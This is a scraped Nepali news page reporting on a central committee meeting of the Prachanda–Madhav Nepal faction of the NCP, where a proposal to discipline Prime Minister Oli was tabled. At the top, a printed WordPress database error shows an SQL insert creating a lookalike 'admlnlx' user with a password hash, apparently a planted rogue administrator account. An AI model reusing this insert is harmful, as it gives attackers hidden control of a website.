WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3BQcCzJW1gqPmFHzkV8FTMc4CNtwx0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:20:35', '', 'admlnlx', 'admlnlx')

प्रचण्ड–नेपाल समूहको केन्द्रीय समिति बैठक जारी – Gaule Khabar

प्रचण्ड–नेपाल समूहको केन्द्रीय समिति बैठक जारी

प्रचण्ड–नेपाल समूहको केन्द्रीय समिति बैठक जारी

काठमाण्डौ । नेकपाका कार्यकारी अध्यक्ष प्रचण्ड र माधव नेपाल समूहले बोलाएको नेकपाको केन्द्रीय समिति बैठक जारी रहेको छ । राजधानीको कार्की ब्याङ्केटमा बैठक जारी रहेको हो ।
बैठकमा कार्यकारी अध्यक्ष प्रचण्डसहित शीर्ष नेताका साथै केन्द्रीय सदस्यहरुको सहभागिता रहेको छ । बैठकमा प्रधानमन्त्री केपी शर्मा ओलीलाई अनुशासनको कारबाही गर्नेलगायत ९ वटा प्रस्ताव पेश भएको छ ।

बैठकअघि ओली इतर समूहको स्थायी समिति बैठक समेत बसेको थियो । आजै ओली समूहको केन्द्रीय समिति बैठक पनि बसेको थियो । सो बैठकले केन्द्रीय समिति विस्तार गर्नेसहितका विभिन्न निर्णय गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका